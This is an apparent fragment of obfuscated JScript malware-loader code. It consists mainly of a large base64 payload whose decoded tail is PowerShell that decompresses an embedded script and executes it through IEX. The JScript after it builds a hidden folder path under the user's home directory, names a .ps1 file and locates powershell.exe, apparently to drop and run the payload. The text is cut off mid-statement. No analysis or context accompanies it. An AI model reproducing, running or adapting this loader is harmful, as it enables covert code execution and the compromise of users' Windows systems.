SdEN5VlVISUdFQUg4UnFBVWRMVWI3ekN4OUNnMXIyQUpKTVdySDF0MVVCR1VMVE4wRk1oNDZnbWlubVpXRUErUVhSVnExVUlqVEdzcjFsM1ZocHlBRmZJNHJhV3pJMGxXQnoxRnZjdHVPQ1dYeE5pM3dia0xpQThaUkV6cE1EMGxLNVY1Tk1lUXhwU0diN1poVWk0UVp5bE5ha3NINVZzeFJueW1MOGkyUVppeHFtM2lsUjBlNVV0amg3RkJsK1hWU0FJNUFPME9EU3BaRkhnWkdvRlkwckRNRGd6cnJxaVc0czBPdWl5Z0tFYVlLdzFJTWRQM01XbjBDRUxMMkI2eVNickphd3lCKzR5akxVdUpkUzl0SzgxOEhUR0NoYS9VMW9wUXVVaUxEWGZsNUpwM21rMW5xa2J1Z21ZZk01bG5sTWYyb3F5NWRKN3RZcUVhdUJTQ1hrMkxOdDU4UkdxVlFOYUFMM2lWbFVzUXNQbXdFWHd1TnpZMmJnTzR3aHdhWVNBbUNhZllaRFMybXJxQU9CY3RGVEdERW1rc1pJaDhCVXBMV01iVXNLaERKdHVvWm9ieE1vTUJkVnd1MFcydEJnN1c3dHFpMUcxSzBDWWwyWkNaeWtDZ1ZtcUNvUjlkdVlPeDBiR2hXSmthcExjbER2VW8yQlVRWk5vdGJ2eDh0ek5vbEtteXJOVG02YmtPODNvTmkrNFVJejBER1JZMVNzZWFoRGxtS2dqb0lSRjZXYW03YW1nanYyN09vVHBSd2xZVFFiYXNndFlQbW9neEVDc2tLeHhDMVFaTk9ZUnRqVlM3cEdCR0ZjWWdUQXhncGNBblk1UUQwMGRqSnNDZFJqYmlNSzVsODYzaW9EWFp4SHJoRkpUaVFsVk54bGd1SnhCYnBONG9SKy9sWk5tNWQ5aWlBZUdRd1F5MjhjWVFjcStTUnF1Q1FZYk12QTVmSUF1VldIMFJNWE1BRGNlQkRDWkVTRnJBWVpVVktZMENJWjNsRnBHaXdVVXp0WTRpVWtrSGRjUVVqRytya2RwdWFqV2RwZnFLdWtiOU03ZEo3WHNRUTFyVXRaU1IweXhqSjcrZXJIQStLVm5vek9HUWswYnRDbkR6ZU0yZVg4OGJIcGx3c01KSXl6R0NCV3FJNVExQTFoRFphTm5TaUErY1FaVUk1dkswYnF3eVl5V3RlSXhZQ0pldFVzQ0lISy81TDZQU2htMTZBR01CNFRSVXhvSXk3eldtelJWMU5UbURtTHVMMVlOV1pEbExXTXNyVGxXNlNtTkNPVW9tRGRnWWFuNlpTcTJXK0hrU2d6aG1YRjVXQ3l5YjFuYjdRQ3o4RzcwUVZEZnVjMElsRUwza1JrQXdpUC9IQ0syQnFGUmdVUW04MldoYkFSa2xtNkxielh4VGdCV3ZWaFlLWm1pY0ExMW5KTmc2QmFhMG1CTGFFU2kwQ21nbGhCOERqNkE5S00wRk1pMnBXQiszL0hRMEJMV3czRXowdFlpSnVXZnowNWJveE80c051eXdScVloK0tya2RQaTY2Q3ZsSEl4YVVMcVA3cUhsNVNEc0RERDlVcWdYODIySDhScGdpSnN0TzdXMnUxWGF0TnhTaGprVUc5SEFLU09lNkVEM1RzZWlNUXRFRkZDckVkVGFYQk14aGNXSWoxWHB5c1lLVVIyRGFLOHAxby9iK3hYbW8xRGFhQWhieE5LU2tlNGQ3V25nZG9FekFjeE50YloySmhsM2lFVWUwYktRWi9FbUVpSGYwOVVRUWhaSzQxYVFyT3V0NmJMQXRrbGhVckhBbjdKVUtPUnFCYXplb2haWjk5bTB2Rm8xTmo0akFRQ2ozbERQV3hzejdpTmhmYTZMalQ2L0lIMWJra0ovV25GV0tGcVpUUVFTcW9vSC9aeWNDckFTMnJLYVlpTkdZRkNWNzZLQVlDbXpLTkI0bTRnVXlKRFRNSzVSYlZEU0JGaG9ReUp1YTd6cTZQMW1YVUdrMUprVkIyRU41Z043WFlsM1R6V2tJUnA1R1FGaDZPYVpmRGVNMTA4ZFRJcWdaQm1ibHVnOGljZ2dCd1pUdEtJaWxMRHdDVWhhWGdxd2tldkJOT3JXa3pEWHlkSmxxdFV0S3FSWEUxS2EzSXlnek9Ic1UxTzVodFhYMXVENS9wWXNtV0xKeXlXYjFWVm9iMGV1cWpoeEhzLzRBQnVBMEZEUVAvUFdVbHpHKzFWU0FnaDl4Rml0Tzc3UTJBeTVpQXFrWVROSkpwczEzZHBUVlZVdGVTczQ4cktjbTFpamlnaUlpT2VxMFJ0M1pxdHFzQjQwNkNSbEpDMGh4MG9RQkJnY1RJMnNhSmVSaFFOd1J6cWtGdEdWZWk5WEVkSlhvSldiQ1hvMmFHSlpEaE9pcnh6Tm1OdEpWdWhvNjlJMGJWZUZaclpHVE5obVJDOERQWUhieUNCenFWd0xPb1BsR0owVnk2SkFJamJXUCtvb1NkbGNVTFdTM0tlNm9XMHlYbTJzQkhSVTJJNkRkanVzc25WWDdzdEtlYXQyalFtTFlZVlVadHFpTytCeVhIWFZRR1VzT0pCc284WkJBeWIrZUtZYUtrZXNLRDJxUVY4WEJESkNLTVU0WTJ2R2lJUk1Ba1V4aE5UZFVrN0xNS2lnN21KY3dqbkVUVUlGWTd2T1JOZElJczV0ZEJnVEJyd2x5ekNMYW5kYm1DYVZZajRpTUk1S0xwSEZOVmozcnFETkxkQm5abzRpVmx0WDVkbXlwVEtTWXZGbUgxWFphR3dseVRiV2tzcW1ybXd6U2c1ajNBaldqZm5LSmozbVpFcHlZUXdGUHhmSWpCVFp5dXBEdkhhS2RWb3JXbVg4UmcxVlhVUEw1WWdpTys1dW42aFlINnpqelNUSllGZ0h0STlzaGF6SGN0Wktwa002VzZ1U0FYNWMyMjI2U2I4aDFPUzRkNGFGaUtRNXhwMG9VS25SVGMvb3FDRXVSM2YrcEtBUHRtZ2xNbXdueGlhcW9lT1gvTnA0bVVQQWl3QXBxMkR1N25jMFpaUE1sK1phS0pacEd5MHpYVWtXSnR0K0RRMURVRUpnYXkyVnNjdHJPNDB4SXMrV05VdjFTWmREQ2N4eklHWUN2ZWg3aFp5UzkyT1hTRkVWZzdLaHdhTHNwUHdPS1J2bDJWaVMxaktVSW82bGdpcldyMXhsWllDUW9qNjFLVFdHMlJ5V1E5RHhzUkl0bCtsV2xrb3BLcWN5VXlhbU1JOWFkTUxYNVhnblFuTEUzY084V0hkek9JbnhYSEdVNVFxZ1VOTUN6Qmh4Mk9HYXhYSjZtNXBqcGxFSGFTVy83RzQzVUI2enRWR3JsckE2STlOQ3BsbEwyV3Bod1R4TjB3UVoyRmlueWVGV21yWkRJNnBSU2dKdnQ5a3lqeGF5SEkzamxFUEpoc1c3d1pJbG1EWFFzeUdNOTNVMkdmUmd0NzVZUW9WaUFZS0Y2N1JNUFh3N3h1VmIvVjRWU0Q3RTR0NUJCRTAzWnNyQ2dnbngrVjBTbExwT2xaWEo1aVdZQkxvZHB0VXlGaWJNZGpmUUhTU0JlYXhYMERHQnQ5QldNV3lrd25URDR5RS9FRUloVUJkTDRvdXBHa2g1UVMzcE1KYnM1U1pxYS8yUVMvZGtkUW4yaWdWcWg1ajZzRUJHV0hYZnovS2JZQm54ZmF1NzJscGlzejdPdG9zOXZwb21GdFlteFh0TXZUa05Kc3A2YmxCMTBsbWtleFdJVndoWExQUm1GVitFQXVlckpwWUtkOHNhVmJJYmx3cVN1c01sZW9OWVpnTno4SmprZWxPcWlTMkNhUVlGRlU0UUZVclRXWVppcFUyS0JoWitKUlFnb1hjNWJSdlhxK014WVBCV1E0R3V5MDZ5cG5qeVVDb3FUczNJTEttS09aZHJMTklENkxiU29SUERic3h0S3QxMHNNZ1IrdmZ6SkVNR01iZ0xabVJzaTdVeWhESncwbDNLbTJQZTM4TFM1M0ZjUCs3clNjUklMdk5TbCtTbW1Ib3hKMGhiY0xsa1pscHM1YkZ3VW5wWVBZVHRtWGFuUWRGSVNwajFNVnBOMmFxbmhOdGRhYUVobW16a0s5VmMzV2wxNnBzNjlDS1ptSFRhTFRZalArNWFFeklUZWlzRFUrR1dMM3ROS0htek9xR2pJc0pRUkJBOHBzQU1WTFQ3Tk53UEFBd0N2WEVNVEJXL3A2VWtJOVZKbGd3bFNacjEzcmFvR0VQbUM3bkt5RnhaNjlHSU5taVcrbVNCOVhQSTM3dVFGbG5YQ1FmeDNnWlY3VEMxTjZ1UWxsSXBvN2hJMjVKS2QraGpQSmVXUWpXTGVaQVBWaVdmV01wbXJxWEdESmJ5aUk3Vjdzb0VTcnBDZ1c1SnJoU01VSW85MVNCOHIxK2FZUUdhb3dpejFLbVdWUDFnemR0RnB2U1pVb3hZWm02TlFPOWJMcmpDR0F1aHFhL0ZHek9rUUNORTZEakdPbEM4dGxBRnNTQnROeXNzUlRtVFVXN1VITEJSc0NwRVdHZ2orb1dBQ05rQUt5NnhUY3lndEVpaDZFUmZkWk5zSThWTjZTWEdWZ2puSU9YVTlVcmJTaU5RTXVWdzJXMldsK0N1WFZBRWhFKzdmYUtsb0plZjZwTmxxc1JwSzBwUW9aSXlnWXcxNGJQM0d6MUhoMHdiUVhXSzZJdlVoS0RsWm9hakZsc1hnS0JUejZHZG1kcjZacWlUSGlWM0tTenFzWmpnc1p4R3VCYTcrTmhJUm1sUXg1anFDMFNwT29BSlpZMjZyV0RsUGhhRStMd0IxMkFZTkFSUkkrQ00xeUVaMDZTajBURUMvSEVMNjNPTnR5Qm5JTWFFWVRZdTJ1NmpyTTRVWVJwb05DUG13ZWxnalZ0VnlvcEpJTGtoOGM0WkM2RStOSm15N2k5eU1GUnRqNDQ3RUcvbDhpMkZjN0F3VTBmeGxzbDQ3VzR0Y0FoVU5kRVVmVDI0WCtUTDlqSlFHNXFEcVJhY0t1RjFvWnVwdTJPalZwS1dPazNabEU5VmF6bVBLdFpHbThOU3I4bWFPbzRnVllWY0d4TnFYeGdHV2pLa1JLQlk1anFXSVBzb3ozanJ2UlRnYjMwd3lwQXB6eWlXV2JJSnFpVW9KUkpoNFROblpPMURGTWc4RUkvanFRTERKb2YyRENycmhZaEg1NE1oT3ZtMkswWVMyVFQ2YVNyU1VWMWhRNmNzZzA2SWJpNnlYcE9qYWhKcmVLbU9rSzlGczJ1ckN6S1BKTG9JNGJoOHBxQksyUVdyNVdWbGtIUEVoUklvM1hLU3pNRGlZT09wNmJncFYwRGdKNjhMdWY2R1c0R1FYbFlLTlViSmloSG5mcnJTdGZ1c0VLS0JJQ0oydklKTDZ6VjdERks4TDhxSFZVaWpPcFJ0eXhqekhoMm9DQStGbG02UWxhWmhLaEFqWDdRNm1OZFZvWVNWVzd3SHFvTjFXWUJCQ0dFeXlGMTVXaUVaamtDV2NzblYwS0ZZUVZTTjRUQXEzaWtJSEhLanpaeEtNMkdxamJaOVdWaVh5d0xiTmlCWmhMV1hXemVyUms2b0tWMit6SU1VMGg0SVFWNGNVejhxa1c0S2Nma0FVL3NjbE5yOWVGYlV6SGp2TnlzNlphbnVXZUc5S1BuZ090MFpLTTFCai9XMnRsS1hlaUo2SXIzVDZ3WElEQVVSUWRVc05heEpwWG05WWRMQWFXMlZwRFJqN2lDYm5hQXYweGsvSm4xWkttL1VEY2FoSmVLL0ZpVjZOKzZ6NkV6cUxldnJhbGdwQmFJdnFOdHByd21UTmhXb1VyT0tTU0ZWa3R6cHhDa01SWnFISGwrTFd3Y2RJMWxOYTVNbU9ncFZWNHJJRjNNclB1VjZ3ZHdtNlZCTGdlbzBvZG1sTmNaQ09xZDZMVjZaOHFscXM0MVN5bW9ZWWRpUzBtMjlRcWQ1dTlpWStxNjc2clZDM3FxNTRnQS81M1B6QVhCcjlXNnRUS1pqS2F2MnEzSFN4dm9ROFZkbXZDVU04ME5IZ0s2bFdoa1IxUk5zeEY1dTZ5TGNsNGNLcFdwL21SbXp0dEhOTDZNcVEwaE5SZ1kwMWJzQXhHUUtzSkliZ0N4aklzTE1OOEtpeEt2RUVYSzNSaDBvQkFLMVVMN0hTQkNpSU1KNFZ5TG1PaE9oR3ljMlY2cVhtekd6SjR6OGNwK3VpNnVSQjhYT2RCQ3Z4MjBYVVVZdkU2dzNGVTVMV3BHZTZjV0xJWjExZlFUSnVkcVkyZ0tWMFQwRExOQUlCa0xFcGdFay9kUzBySktSQ3JONFgvcllrQkhQMUd1N1Bld0t4bUthdmV0TVN5U2x3c1NTY3ZmSXU4QUxjb3JqRWVES0dCdUY4WnBUUlNCNURrWWszdFpMMVpLQmlGbTB1OU5TdkhFSzNadG9ta1RqdmJsYUs4WG5CdzRVclUya1I5WWtXN2J0Rk5iM1lia1l0WkJHVXV3VU9xeFp6T1poTlNIRlNvbHZRS3BSYTJ2S25TeHg3bjNIb3NSa1czMXF4V2NMTVBRQTRUdnhJbkdTZ0lqZ2RtUEdKN3RhTGIrRldLY2NaRHRsY0p2Z3RuTXBCOWhkYytKdVpvSW4zSzBhUEdHaTFsazBvR3R2SEw5alZZejFzaTQxRkwxQ0VjeTJMTXgvaldMUEY3aTFoRkNOTnNIM05tSGNHekVZYkh2VlRyeGVJTmtDMW1lUkphZkhJemVYRytRd3pFL1VEZ3pUR2pCSXJkSXdhWkRlU3BwQmtQSFJDWk01REgwYklxM29yRm1LQkN6ZUJNWXJ0bG9kaDFqM1p5S0ZoRmlqNHdlSTBhVVdWVlczM29SVTFMaURaVDhyV21vd1hOZEdRVHJiRnBXOHVMWXRaUm43bzAzWmdBVnV1QUtaTkttaStXSk9kclRLYUN3UEk0YkdKYkZ3eHR0R21veGhNb3hQR1V3YmZEYWxGTnljMEZRUjhyRlN3WUE3cTIzcmlPd1YwN0ROVldNRzdYS05xUFhjMG1yTnFobXVmS2YxdFR2TDZXb0x2bWJEdUpHVE5Db3pWY2ZzdGNGOEpEdmxxcFlib05uUmRzcFlhM0Z6djlPRm1iMFE2R283SDlvZEpqV25IcFhXL2x5YlZZYUNQR09iZk9RMlIva1ZFMzNRSlhzOVptb0tzNkVNTFhCcXMxVzJtUWVzQVBwU1RTT2FKOVpoUzFycjVJTEFCSXQvbjBxaFdTRjRxYVRGMFdERFJGVldRa0lkaUJmTnVwQmlMT1V6VEpzVEpaUUp2Ui9RNVoyV1dnT3I4LytucmJOclVsWko4dmo5K1JRVFp5ZGk1MFJ0VEFJRkZIVXhzZHUrMG9wWXJham9pYjJRbDFKUlVCRks1ZE52VmovUFRKeWRPQmRFTjZKUUZKV1p2ejlrRnJ2THAzbWRnUlBKNitKNXdvNEd5OXQ3a3hLU0lDU3FwY1JWNk13VE9OaCtqeTJXMENvaTBkSHFYTk1YMGVvYjlrekNXUUdqc2pQM0w2a3llYVh5dEV0S2Fhc3p2UHU0L2pWRDg4S2d3Z1JhR2JZS2JndXpxT1IzbVV1dE0xMFpZT2pqa1FNTHY3SmpqQlhZaHpmWUlNekJheU9KcFVVL3RFeG5QY1V4cmNEd2V1a1o0NlVWUUJ2S1ZnSWV6OHg0SUEveEZMWERUYWM2azJZeHpaOTloL0JUKzNKd0hLU25ha0dDM0Jidno3TjhySUFzZFdzeXFHbndPakJ1RVFJa0IrNlgySDQ3bGpzUzRmaTdBRFhCTWM4TkVKMTMyM2NDU1pRald6Q1l6aERHWnRrbWR3U0dWdlNyUzlkWW9UdUNPMUw3YlBPK2tQaDZZNUJkQkFwSlJUc1JiQ3VvMmJNbjJjS2dEM1RKVW1mZndrZitaWlpSdWQ5V3lHQTd4T1ZIcko3amh5bkFDb2dFeXdXK1pBUERXMzQvdDBpbitVUTZYTnJWOWpUOHJwQmJxaXZuNEpsdzR2TTVaVHBCWkRhZFgycmZCeXZ4eUowRWNvRFM5cGdRTWcxQkZ2M0JYSGJuVVNzRUpOZVZ5VG95bnAvRGN5dzRlZmxwSC9VVVNrcXZmMUNUZXR2NUZ4TmpoV2JzUzh3dzdycmhjZm9oUDFQVEE2OVVYOHVxaWlFVDZLemg2Y0JadEE2VGk5ZmRwMTcyVG9mcGw0eThoQ0NLdDBNNGpDdFhkUHVIRlhWVnVHczdlcnVGR3MzR2xSZG1wdUJIT3lwMzFOc2U1TU0wTDVEM1BwVXVDR3hpRXRKYnlrR3RvWkFZTzg2b1VKTzg2SkFGWWdSb0Z3YXkyRW9ETVRwVDA3eUFCdTA4bTFVeXhtRlZtQXlIU2VhVTIyRTZUYnVKTUREd3Vwd1lqUGlPY1l5U05nTTY0Q1pjY1pCM2VDM3ErRWR1VkU3NlkwR0QzWms2dXhXQ3JYTkUwNjBuQjNFVHNQVSsrSURjSmpxUE1kL0FHQlZJNWgzblRVQTYwaCtBbVJleFI1ZVJzN1RPdFBrWWVpbHk1Q1lrdzlkRDJSTzBwakR0aEZDQjJMa21pRk0xUk1jVXg5NkR5NmZBSDROWi9NejMwa212V3A3TmRCa3FQSVM5TXMySXV6ejRyZ0RLNUhQemtLMkh2THlnRnRqQmQ2blBlQWNjKy9ubE1LTHJ1VnprWnRmcnlQWllwN3BHRVc2dXptbGxPVGh6aEhaRkZzMWg2ME5hUDFjbDBuT0JJY3pDUTVteVJoQjFLUEcrODNidkNrcm1NZ3huNHVaN3lxMW5qVjA1R051Y0dweTBOOE9yeE9rY3lHQVFVT2NPdWtJcDFSb2xBbExRbWhLVUN6VTUzSGUxZEVNYzRURThqYlNKM2dYVGxJbU5SamVINk53ZGdRUHFIVWlvai82Zzg4NmVSMlVKSlJxYUY2UENCbjV5YkE4M3dZMDZNd3hzTTRpUzVkaURGL3UwL0EyY0p6ZWQ0OFBLMmNmWXZDMC9aeC83Uk9IUUhZdjRxbXRVYWQyaGJjUS9jek8xQmV1N3lQU0ZORktpaytkTkM5YUNNSEpIdS9kek1QYUUrNHJ1bFJYQkJjeUwxa2VOMkdRYzZmZ0Y3bEcrUnB4c1d2VDh1b3JrSmRFNWVVZkZqUmJpQ1lZdTVOdGpvVFBMSFJGci9Zais3emJRcFdCMnVKSUVncGlzQkpRY0R2cFpUNnlzRjRvK0JWbjhyZE4wbmh1SGFnQ3VieXI5MEw0MllUanE0WVdRdm5meWhoelYwUWNsSFpvamgwZEc0UGhZcUVsMlh1d3U4YUE4ZlBVNDhPMExMMmFycXdxM0FtYjBTNWUxaFZrdDhaemhUc3Exc0FydW1pTFFwYnd3NWtBemt2SHdVeTZuT3A4YUxjR1dPY0VtNFlDb3VFNDA4RERRSU91UGdVME1DNkxyWnhGVzJHajRtRTk2cW41TjJwWEVFMURQQVNlMEk1OFNuajJ2eVdad3E0UGMzWGlORTlCTmhYRm9Ed09reDVKN1N5RmVYVU8ycUQwd0lFdndkNGt1YVdzbmt0azZaVmcvWjZlNUFLT3V3R3o1SUVTTlpBQ2ZBQW56bU5MWEhCMXcvU1l2TWtTL21CRnAwQ2VhOEROR256blBkRDRXTUE5UGV1Z2hnbmErT0NENHRVVkVVUjJpTjljbHNvR3VId01WM2Q0T3QvbWF6cXc1SDI1eFdPanFqbTJyQXVTWEQyc1J1VzZRbjFCYmJzOXYwejFJdHh5UGE1aEU3aUZQTHloV2NZQ3lBdmtjOFd2R3JmdW5CL3dBWGlFWmRueWZrbkt1bWdyZE1vMzEvUnRkYzdwNFZ5V0d3VFZzK3RGTksrSnB4RTN5Q2VTeEE5aFY4R0RNSnhlQWhZQjlmVEJSNStjekhKOGJsRDF0ZmNDeGRPTVRIRU1QWCtjUG9GYysrNkJ1RWJndnJuT3N1SDU0RERGSGMydXkxQy9Sem5nZTg5aHdKb1lYd2xVaFJqWTl4T2pVa2VxVVVVdm5uWmtvdTdVdlVWeVh5MGFNa1MzNmRBOTl6K09DQjZFdVJhOFlrOFFrMm01TUtBcnBHR0EzR2RFMTBJL3ZmQlNNV0FGS0FxQmYvT0FSVXZQYllsT2doQ1lGaXZjWHdjVjJ2Mlk2ZTIxcHRHTWJkOExmcUZtMjB4WDlVQzV4SlZvMzNQbjdreTRPM1ZpOTVXVHh1TjZsUkRIV0ZOcHBFYmJxc1dGRHBRT3lFaUhpQkE1bkNrRFBZbDE1RUFna0JOdm92dzJKc2VGY2Y2M21rM3VHbmRPWlRqVEtycmRpbVVyZXJIdVdOM3ZlYkZIcmxDSDBKdmZIbXRxdkVKNUoweC9kbkZoWDJkbmRZNGo5bFU2bFZ3Rk03cE5DV0J0RnBoa09xNnVZOXZvUCtUemdBSnREcjRqNkFYaThuOWE4c3ZiWGFvQmhhZDgzMmFFeTlITU9BVlM5QnhYSFJwem1vdkFRc21pa0JvRVBrL29sbm1hM3pPOFo3R0RsRDF3WFEwTC8vZFZZRFZ3RFJJdTNqMXk3QmcvSGhGRWo2SW03TDZSSHpTMjVUNnRCamJGQXkwNU93NlJva0tnZkZNNW1LMll5dDgvSWhWOGdnMjJtYTFUbDJSdnFaNXVJNlJTK2tMNUxmVjhOV3ZrY0FIRUtnSWc2MUpVZVl4SzlQdjQxRk9GUFpHL1V6QXFOU0pjZGU0blhZUk1Rd2hOUFYyWWwrcjR4ZEtxRFBzZ1g3c2VXU0RuZUNnM0s5eEt1SDBHeEc0eHhHOG9UOHIxdGdZZU05YmFSMVBldTlEWTBSUmRlZUl3eDd1b2swWTZoeXBGVzBCdUZCUGRsNFY5a0ZvV3NMZ3RKN1E1Z1MyM0t5UWQreHlmby9rNEN1S1BSd0M1MEZvZU5yVVpqc1NyOVZLWlRZZHo1dWg0NmxGZEVWOGRhUEZ3QjhvckdlbE1FZFJpQmcyRG8vakF5ZE5LRkFvVUJlSU1admFETDZmQU1uM3ZsSlhLQlBYRFVtNTQxUi9ZK2dxNXZGVnlpdjZwMVhzUklvdmpGZUNmc2lzanpFTDlTNFNEUzZ4RUJWMzdoUHU5b1lOLzdjYjczZzhiRnZvOGx1Y0NvZFM1dThCWXVQTkdrMytodTN6RUh5SkhlVVVXOUtjS1ZkMFJwSGoxelgzeXFqdHhITHpRelpUZ09PZVRDZVJQMVFMdkdjWHF0bFhCaVBsYUpjM0NMRUx2cjhEMFh4TFUvSWFRVDE1UmYxNVViQ3MrcCtWTjgzR1lrendrbEUzV2ZUWFVxV3NoeXJYdmthbWRBRjVlMHpCS3pqOG9DZWZQWXZXenErbUxmYzArZFI2cDJmYkllN0RQVkh0bHgzTlY2RjhMY1ZQTzM2dUs1dUpwUmUvWDJFRllZazFDbW1KdVhERTdqUVRLWHNzWW9OMGZsdU1sSDZXT250QWdZVTQrdytTbTUxSTdYU0R1SE1ockJtU0VGNm5vQXdJRVgyMnpmbkx6UzdSYk5uVWZ0TGpLOU9KeHQ0Q2s2ODNZcHpzcmJjaERyVWJodVl6b2ZCOG5IMkI3d2QzVTROWnlYOHZSd1lPYTYrK3ZsTHBWU2lCMnoyQ1pNcldRY3IwV2YzbVY0Mi9Cb1l4S0NsempQMW1IVjVOSDhqc0dKWGJoSWpha0Q2L25PUDV2dTVBWGxjaEZUMHlrYVIrZHdJaVBmM25UUE5pd0x2VWZ0Mk5IeW9BSnlDdEhIMWVzZEM5dlpHSnZYUUkwQ1AyZlQxcVhkanRRVUExT1JGaGp2SU5tUXpjbnV2M1ZrZ2syMHlLejJBVk03NkxmN0I4QVh6RXdiaGdSTXRJMU5iTDg3Y3FYbVF0YVBrNVhIZ2Vhd01YcDdxc3pyNmd0RmpSM0UwRHpLcXQ1bnliSVFyNDFUeVR0bitacSs4dHBXQlhZL2ZUQTlrVVdNb0JnalZ1WW1laUNYZHhOcGtMZjNWSHpPRWdqZGNpY3B2eDNXT3VmRUs1c3NYRDcyYWR3UUdMZVBrcjJ0aWdzdmRtRnZrN1BhTktFZHViZkxrb2ZCV2RnSHNuNXZiZDdzWmxxYVhBYU9NNzdNeFRxS0ljUytXTXBnMTMyWlJEU1hkWmtIZW9xUWl3ZlBaelovYUtnUjZIL2tiUlBuMlg3clh4ZUJPazJHbHc4azFndDA2NWoxQ3BFeEo4dmhWWkNwTXR6WWZjYjhPMi9yVTltdTE2eFZpK0x1R0tzYU5SMGViUTdxUHNuV3FLaXR4UVl0Sk1yc0JRdHJOVnRmVnp0N0FjKzk4MW9sTENqWlFqcUhFa0hZM013bnorVHo0VzNpdDhVaHZ1eWpHbjMxdlFqaU5iQitUSVRaUEV0bXVvMjNhVDVXNjNiMXFFMWVNdmxteXRoMm5kRU1qQVpkZVhxTHM3aGNScm0rUnFOazdweGZsV08wbG5OL3dnM054MThTTXRpMHAzTHo2a2J0bUt5OFNaMDQrN3E5M3llNVUzd29lNytpci9KNG5LSGVXcU5tVGxTeDQ5Qi9uRWsxNmpwME5GTlFyRURoai80VzFXaGdTaHR0MVRYUE5CeGIrU1d1VU93ZzdPeHYrNkYyRU5XYUJQZjZOSkxhcWpmeFBQMjYxUjNHL0huaDVGZDRTWkY5RXNvcURNMGo1ZTFycmIyd2ZjKzJONnBQSGh6OWROYU43cDZkOURMR3VPUmg3aXpIYlYvWEkxQzBaNnN2WE1XdEZtMHgyZFhNWjNzVTJhOFdRRCtYT1lDMVJTNEZhNFBoSU0zQVhJQlQ2a0pRNzZMZ1MzcXJHRmFLWXRETGVaOEI0R1ZMMExrT0YxOTRSdjFkTHFhYjhZc1Vtenk1TGtmTVJydExVejNQUnNkVUZiNm5TVlJ3MUFjd3p4UVZpS1dLNytha3kzWDFBQkY1d2lvSWtSUUsxTEh2TTlHMStlY0RCM2NyMkpQU3p0NTM1dFNubEJrN2JwRlJtc0xGOGhGYmpzZ0hObERFa3Z3dHlmd3AwSytoZFpHTUVyRmo0STl3b1hCRUFtdDU3eEJPNUlFa0orMXYvZFk1enltc3VndGFrd2N0Zkhpc294bWNxZkk1ZFo3TUpWcEU1QzN2SUlFTWV4d2phNlVnWUc4cHhiV1M2a3FsdkF1cGJrcUtXeTNVY1RCUTdIakE0R2FISHVxVEN2Vi8zaDJSQmZjaXV1NWVqSGRiSUVZYVl2Z2RTQ0hlQ2lOeS9EUTVKMlAwSUtVaEJWWGVydXNJd2dQdzdLSnlXRWdmU1ZsNW1TeUVZOTBDa0htZVkvZGRxcXhpSWMyNExrSk5ZVVZwMWVyY2ZSVVJvaGh5T3Bja0loM3QzQjRGZDBlWkcxSGJ6V1hmRnlZeTBjZlpseVR1Q1NQaU1FQ1JneUtHVW1vWU5pZDFLcVNyUG1ML2FLY1M2WVBtUTVuTEUvV2x3N0FiUzR4WGhyZkdFQm5pa2VlNmpEa2p2T1dFMTV6ejIwUFNxSEx0OXVBdjhGSWFHVEpBNVFqakluSFhNaU9idXFwNTRleEZIdEE0UnluYnRkaGFKbENXajZzV1hoblRtV28zV2tWcTMzSmx3U1BtaWxHVmpUa3lUKzdUV3VFNG9SaHRXU0ozaU1FVzZOeHhobGpQQ2FCQVZXaEFkMFRMdllUV2xVSVZCZ3VGd3V2a0QxR002V0pxMHdEOC9GZ2hjcklCZGFQRDI1dWZyM21Od0pBalRobkdoci9MSG12OXlPWXdxd2FDUkJpK21IZmNBbHdlR1RKMk8rbTRRL2d4OC9pZGs3QlFibzc5eG9TMFI2cC9mQ1BMdWJOY3RUSzBIQk5Tc21wd1JLZ3NacFNOOGJJR2VLSHlkOGJvRzNWWEdmVWRrYnRyenBoTnRDUkJ3bGVPem1pcytTVWJYblNhS1BhckpDb1NKRUd4UG9qWVY2cjg3Z3YxK3FjUDNoU0hFT3RGTHc4UkE5djc4QXRGa2hmcVJSdjd5b3R3TERrdmhsRUtNVHhGdFlkS2pZa1JJc3NSY3ZVR29XendGZDhqdW81eEtSR29OdmgzWHJrYkNXa2dGamVNVkhIeXRMSlJGWFhBdWpKVkF0U2tvMHgyNzczc0lwN0laa2Y0RlJINlBoQndMYkJkdU53aUFhZXV6OS9BMkJRY05nWjliOExHaGJFZXJrOXdmWVRySTF3UGNSMVZOTk5waVFHd2VqWVBCTDBSL2JqcjQvbVBmL3p5bi8venkxOEh1YnpvNmZDV1RaMS9UMW43eDFlcHp2Lyt6L25ZVHRmcTd6Ky8rdU9iZi9zZHQvNllIL25IQi8vNys4L1pPUFVVOVBXMTFEUHJ1dmJQTjI3OStmUnV2LzNYNy85MmlELzhQOFB2NDY0R2VmcnpzOTkrK2V1cVN2L2ZEcjRuL1B6VGQxTlp0c1BjMy83OTlMNm50L3ZibisvbWUwN01Iei83NDh4Ly8vR1hIN09SNnhmcUhpN1haSC81aTlyWCtuVXMzN01mUi9WN2VNblY1Mkx3K2E5M0ovenljd0x6NzltTC8reFF2L3p4VjcvKzk2OC9GdjNKejhrWGYvMWpDLzRQCidACiREZWZsYXRlZFN0cmVhbSA9IE5ldy1PYmplY3QgSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbShbSU8uTWVtb3J5U3RyZWFtXVtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkRW5jb2RlZENvbXByZXNzZWRGaWxlKSxbSU8uQ29tcHJlc3Npb24uQ29tcHJlc3Npb25Nb2RlXTo6RGVjb21wcmVzcyk7CiRVbmNvbXByZXNzZWRGaWxlQnl0ZXMgPSBOZXctT2JqZWN0IEJ5dGVbXSg2MzE0OSkKJERlZmxhdGVkU3RyZWFtLlJlYWQoJFVuY29tcHJlc3NlZEZpbGVCeXRlcywgMCwgNjMxNDkpIHwgT3V0LU51bGwKKFtUZXh0LkVuY29kaW5nXTo6QVNDSUkuR2V0U3RyaW5nKCRVbmNvbXByZXNzZWRGaWxlQnl0ZXMpKSB8IElFWAo="; var jsLoaderPS1 = "59d76612d0bf51.62744684.ps1"; var jsLoaderRunDir = "{453359DE-4049-82E2-E58D-F96EEF430F04}"; var fldr = sh.ExpandEnvironmentStrings("%HOMEPATH%") + "\\" + jsLoaderDir + "\\" + jsLoaderRunDir; if (fso.FolderExists( sh.ExpandEnvironmentStrings("%WINDIR%") + "\\SysWOW64" )) var powershell_pthpath = sh.ExpandEnvironmentStrings("%WINDIR%") + "\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe"; else var powershell_pthpath = sh.ExpandEnvironmentStrings("%WINDIR%") + "\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"; var p = fldr + "\\" + jsLoaderPS1; var vers = "3"; var uuid = "1"; var com_pref = 